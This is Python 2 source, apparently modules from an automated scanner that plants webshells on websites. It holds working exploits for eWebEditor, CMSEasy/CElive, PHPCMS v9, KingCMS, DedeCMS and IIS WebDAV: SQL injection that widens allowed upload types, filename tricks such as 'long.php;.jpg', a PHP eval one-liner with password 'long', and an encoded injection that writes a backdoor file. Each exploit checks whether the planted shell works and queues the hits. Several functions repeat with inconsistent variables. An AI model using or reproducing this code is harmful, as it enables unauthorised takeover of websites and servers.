def ewebeditor_asp(self, arg): #
try:
url = arg + "/jms/edit/Upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a"
files = {'uploadfile': open("long.asp.cer", "rb")}
r = requests.post(url, files=files)
data = r.text
#print data
p = re.compile(r"parent.UploadSaved\('(.*?)'\)")
sarr = p.findall(data) #找出一条
name = sarr[0]
#print name
url = "%s/jms/edit/uploadfile/%s" % (arg, name)
if yijuhua_CS.yijuhua_cs("asp", url,
"long"): #ASP还是PHP ,URL地址 ,密码
#print url+"OK"
EXP_list = [
1, self.url, "exp", "exp_ewebeditor_Upload_asp", url,
"long", "webshell"
]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
Class_Queue.exp_url.put(EXP_list, 0.5) #插入队列
else:
#print url+"NO"
EXP_list = [
0, self.url, "exp", "exp_ewebeditor_Upload_asp", url,
"long", "webshell"
]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
Class_Queue.exp_url.put(EXP_list, 0.5) #插入队列
except Exception, e:
#print e
return 0
def scan(self, arg):
try:
opener = urllib2.build_opener(UPLOAD.MultipartPostHandler)
params = {"fileToUpload": open("long.php;.jpg", "rb")}
url = arg + '/celive/live/doajaxfileupload.php'
req = opener.open(url, params)
html = req.read()
murl = re.compile("<a href='(.*?)'")
ok = murl.findall(html)
print ok
if ok and '.php;.jpg' in ok[0]:
if yijuhua_cs("php", ok[0], "long"): #ASP还是PHP ,URL地址 ,密码
#是
EXP_list = [
1, self.url, "exp", "CN_exp_etcms_Upload_shell", ok[0],
"long", "webshell"
]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
print EXP_list
url_exp.put(EXP_list, 0.5) #插入队列
else:
#否
EXP_list = [
0, self.url, "exp", "CN_exp_etcms_Upload_shell", ok[0],
"long", "webshell"
]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
print EXP_list
url_exp.put(EXP_list, 0.5) #插入队列
# print "exp_kingcms_getshell---%s---%s"%(ok[0],"webshell--pass:long")
except Exception, e:
print e
pass
def find(self, arg):
site = '/plus/dst.php'
heareds = {
"User-Agent":
"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
}
conn = httplib.HTTPConnection(arg)
try:
conn.request('GET', site, None, heareds)
httpres = conn.getresponse()
if httpres.status == 200:
data = 'http://%s/plus/dst.php' % arg
if yijuhua_CS.yijuhua_cs("php", data,
"cmd"): #ASP还是PHP ,URL地址 ,密码
#是
EXP_list = [
1, self.url, "exp", "exp_dedecms_yijuhua", data, "cmd",
"webshell"
]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
Class_Queue.exp_url.put(EXP_list, 0.5) #插入队列
else:
#否
EXP_list = [
0, self.url, "exp", "exp_dedecms_yijuhua", data, "cmd",
"webshell"
]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
Class_Queue.exp_url.put(EXP_list, 0.5) #插入队列
# print "exp_dedecms_yijuhua---%s---%s"%(data,"webshell--pass:cmd")
except Exception, e:
#print e
return False
def getshell(self,arg):
try:
headers = {'User-Agent': 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'}
#data = "test<?php @eval($_POST[\''.'shaoxiao'.'\']);?>'"
data="<?php @eval($_POST['long']);?>"
url = arg.split('//')[1]
site = '/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file='+self.url1+'/uploadfile/1222.thumb_.Php.JPG%20%20%20%20%20%20%20Php'
conn = httplib.HTTPConnection(url)
conn.request('POST',site,data,headers)
httpres = conn.getresponse()
html = httpres.read()
#print html
if httpres.status == 200 and html:
gets = re.compile('http://(.*?)\.Php\.JPG\s')
get = gets.findall(html)
if get:
data='http://'+get[0]+'.Php.JPG%20%20%20%20%20%20%20Php' #Pass:long
if yijuhua_cs("php",data,"long"): #ASP还是PHP ,URL地址 ,密码
#是
EXP_list=[1,self.url0,self.url1,"CN_exp_phpcmsv9_getshell",data,"long","webshell"]
#["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个
#print EXP_list
url_exp.put(EXP_list,0.5) #插入队列
else:
#否
EXP_list=[0,self.url0,self.url1,"CN_exp_phpcmsv9_getshell",data,"long","webshell"]
#["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个
#print EXP_list
url_exp.put(EXP_list,0.5) #插入队列
#print "exp_phpcmsv9_getshell---%s---%s"%(data,"webshell--pass:long")
return 1
except Exception,e:
#print e
return 0
def scan(self, arg):
url = arg+'/search.php?query=shaoxiao%27%3B%3F%3E%3C%3F%66%70%75%74%73%28%66%6F%70%65%6E%28%27%53' \
'%74%79%6C%65%2E%70%68%70%27%2C%27%77%27%29%2C%62%61%73%65%36%34%5F%64%65%63%6F%64%65%28%' \
'27%4D%54%45%78%50%44%39%77%61%48%41%67%51%47%56%32%59%57%77%6F%4A%46%39%51%54%31%4E%55%57' \
'%79%64%6A%62%57%51%6E%58%53%6B%37%50%7A%34%79%4D%6A%49%3D%27%29%29%3B%3F%3E%26%6D%6F%64%65%' \
'6C%69%64%3D%31%20%6F%72%20%32%3D%32'
#UrlDecode解码
shellurl = arg + '/Style.php'
try:
html = urllib2.urlopen(url).read()
#print html
if 'shaoxiao' in html:
shellhtml = urllib2.urlopen(shellurl).read()
if '111222' in shellhtml:
if yijuhua_cs("php", shellurl,
"cmd"): #ASP还是PHP ,URL地址 ,密码
#是
EXP_list = [
1, self.url, "exp", "CN_exp_kingcms_getshell",
shellurl, "cmd", "webshell"
]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
url_exp.put(EXP_list, 0.5) #插入队列
else:
#否
EXP_list = [
0, self.url, "exp", "CN_exp_kingcms_getshell",
shellurl, "cmd", "webshell"
]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
url_exp.put(EXP_list, 0.5) #插入队列
#print "exp_kingcms_getshell---%s---%s"%(shellurl,"webshell--pass:cmd")
except Exception, e:
#print e
return 0
def three(self,arg,path):
try:
site = path+'/plus/long.php'
testsite = path+'/plus/shaoxhaoxhaoxhaoshaoxhaoxhaoxhaoshaoxhaoxhaoxhaoshaoxhaoxhaoxhao.php'
httpres = self.request(arg,site)
code = None
testcode = None
testhttpres = self.request(arg,testsite)
if testhttpres:
testcode = testhttpres.status #返回值
if httpres:
code = httpres.status #返回值
if code != testcode: #不相等为有效
#print u' \nGood,write OK ! Shell :%s%s pass:long' % (arg,site)
if yijuhua_cs("php",arg+site,"long"): #ASP还是PHP ,URL地址 ,密码
#是
EXP_list=[1,self.url0,self.url1,"CN_exp_dedecms_getshell",arg.strip()+site,"long","webshell"]
#["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个
#print EXP_list
url_exp.put(EXP_list,0.5) #插入队列
else:
#否
EXP_list=[0,self.url0,self.url1,"CN_exp_dedecms_getshell",arg.strip()+site,"long","webshell"]
#["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个
#print EXP_list
url_exp.put(EXP_list,0.5) #插入队列
# print "exp_dedecms_getshell---%s---%s"%(arg.strip()+site,"webshell--pass:guige")
else:
#print u' \n亲,你点真背,不存在漏洞!'
return 0
return 0
except Exception,e:
#print e
return 0
def IIS_webdav(self, url, port=80): #iis 写入漏洞 IIS webdav
try:
self.txt = '/test.txt'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remote_ip = socket.gethostbyname(url)
s.connect((remote_ip, port))
message = "OPTIONS / HTTP/1.1\r\nHost: %s\r\n\r\n" % url
s.sendall(message)
reply = s.recv(1024)
if 'DAV' in reply:
#print 'Webdav Is Vulnerable! Try To Hacking....'
if self.put(url, self.txt):
data = "http://%s/%s" % (url, self.txt)
#print "exp_IISwebdav_put---%s---%s"%(data,"webshell--pass:long")
EXP_list = [
1, url, "exp", "exp_IISwebdav_put", data, "", ""
]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
url_exp.put(EXP_list, 0.5) #插入队列
MOVE_asp = self.sjzf() #随机文件名
MOVE_asp += ".asp;jpg"
moveheaders = {
'User-Agent':
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Destination': 'http://%s/%s' % (url.strip(), MOVE_asp)
}
if self.move(url, self.txt, moveheaders):
data = "http://%s/%s" % (url.strip(), MOVE_asp)
if yijuhua_cs("asp", data,
"long"): #ASP还是PHP ,URL地址 ,密码
#是
EXP_list = [
1, url, "exp", "exp_IISwebdav_move", data,
"long", "webshell"
]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
#print EXP_list
url_exp.put(EXP_list, 0.5) #插入队列
else:
#否
EXP_list = [
0, url, "exp", "UAS_exp_IISwebdav_move", data,
"long", "webshell"
]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
#print EXP_list
url_exp.put(EXP_list, 0.5) #插入队列
# print "exp_IISwebdav_move---%s---%s"%(data,"webshell--pass:long")
#else:
# print 'Webdav Is No Vulnerable!'
return 0
except Exception, e:
#print e
return 0
def scan(self, arg):
try:
url0, url1 = arg
#http://www.skyscom.com/celive/live/doajaxfileupload.php
data = "%s/celive/live/doajaxfileupload.php" % (url1)
if 'jpg' in self.URL_DZ(data): #检查是否支持JPG
EXP_list = [
1, url0, url1, "CN_exp_cmseasy_IIS6_jx_JPG", data, "", ""
]
#["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个
url_exp.put(EXP_list, 0.5) #插入队列
#上传文件
#data="<?php @eval($_POST['long']);?>" #一句话
files = {'fileToUpload': open('long.php;.jpg', 'rb')}
r = requests.post(data, files=files)
data = r.text
name = []
try:
p = re.compile(r'target=.+?>(.*?)</a>'
) #结果 [u'CELIVE-Q7duV0tNj8.php;.jpg']
sarr = p.findall(data) #找出一条
name = sarr[0]
except:
#print "!"
return 0
#print name
data = "%s/celive/uploadfiles/%s" % (url1, name)
if self.http_get(
url1.split('//')[1],
"/celive/uploadfiles/" + name): #验证地址是否存在
if yijuhua_cs("php", data, "long"): #ASP还是PHP ,URL地址 ,密码
#是
EXP_list = [
1, url0, url1, "CN_exp_cmseasy_IIS6_jx", data,
"long", "webshell"
]
#["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个
#print EXP_list
url_exp.put(EXP_list, 0.5) #插入队列
else:
#否
EXP_list = [
0, url0, url1, "CN_exp_cmseasy_IIS6_jx", data,
"long", "webshell"
]
#["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个
#print EXP_list
url_exp.put(EXP_list, 0.5) #插入队列
except Exception, e:
#print e
return 0
def cmseasy_IIS6_jx(self, url): #cmseasy文件上传+IIS6解释漏洞
try:
#http://www.skyscom.com/celive/live/doajaxfileupload.php
data = "%s/celive/live/doajaxfileupload.php" % (url)
if 'jpg' in self.URL_DZ(data): #检查是否支持JPG
#print "-cms-cmseasy_IIS6_jx-open jpg %s"%(data)
EXP_list = [0, url, "exp", "exp_cmseasy_IIS6_jx", data, "", ""]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
url_exp.put(EXP_list, 0.5) #插入队列
#上传文件
#data="<?php @eval($_POST['long']);?>" #一句话
files = {'fileToUpload': open('long.php;.jpg', 'rb')}
r = requests.post(data, files=files)
data = r.text
name = []
try:
p = re.compile(r'target=.+?>(.*?)</a>'
) #结果 [u'CELIVE-Q7duV0tNj8.php;.jpg']
sarr = p.findall(data) #找出一条
name = sarr[0]
except:
#print "!"
return 0
#print name
data = "%s/celive/uploadfiles/%s" % (url, name)
if self.http_get(url[7:],
"/celive/uploadfiles/" + name): #验证地址是否存在
if yijuhua_cs("php", data, "long"): #ASP还是PHP ,URL地址 ,密码
#是
EXP_list = [
1, url, "exp", "CN_exp_cmseasy_IIS6_jx", data,
"long", "webshell"
]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
url_exp.put(EXP_list, 0.5) #插入队列
else:
#否
EXP_list = [
0, url, "exp", "CN_exp_cmseasy_IIS6_jx", data,
"long", "webshell"
]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
url_exp.put(EXP_list, 0.5) #插入队列
except Exception, e:
#print e
return 0